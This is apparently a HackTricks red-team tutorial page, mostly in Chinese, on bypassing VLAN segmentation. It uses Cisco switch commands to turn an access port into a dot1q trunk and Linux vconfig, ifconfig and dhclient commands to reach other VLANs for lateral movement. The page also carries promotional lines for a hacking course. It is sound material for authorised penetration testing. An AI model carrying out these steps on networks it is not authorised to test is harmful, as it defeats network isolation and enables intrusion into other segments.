Lateral VLAN Segmentation Bypass

从零开始学习 AWS 黑客技术,成为专家 htARTE(HackTricks AWS 红队专家)

如果可以直接访问交换机,则可以绕过 VLAN 分段。这涉及重新配置连接的端口为干道模式,为目标 VLAN 建立虚拟接口,并根据情况设置 IP 地址,可以是动态(DHCP)或静态(有关详细信息,请查看 https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

首先,需要识别特定连接端口。通常可以通过 CDP 消息或通过包含掩码搜索端口来实现。

如果 CDP 不可用,可以尝试通过搜索 MAC 地址来进行端口识别

SW1(config)# show mac address-table | include 0050.0000.0500

在切换到干线模式之前,应编制现有VLAN的列表,并确定它们的标识符。然后将这些标识符分配给接口,通过干线访问各种VLAN。例如,正在使用的端口与VLAN 10相关联。

SW1# show vlan brief

切换到干线模式需要进入接口配置模式

SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk

切换到干线模式将暂时中断连接,但随后可以恢复。

然后创建虚拟接口,分配VLAN ID,并激活:

sudo vconfig add eth0 10
sudo vconfig add eth0 20
sudo vconfig add eth0 50
sudo vconfig add eth0 60
sudo ifconfig eth0.10 up
sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up

随后,通过DHCP发出地址请求。或者,在DHCP不可行的情况下,可以手动配置地址:

sudo dhclient -v eth0.10
sudo dhclient -v eth0.20
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60

Example for manually setting a static IP address on an interface (VLAN 10):

在接口上手动设置静态IP地址的示例(VLAN 10):

sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0

Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60.

Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions.

References

从零开始学习AWS黑客技术 htARTE (HackTricks AWS Red Team Expert)!

最后更新于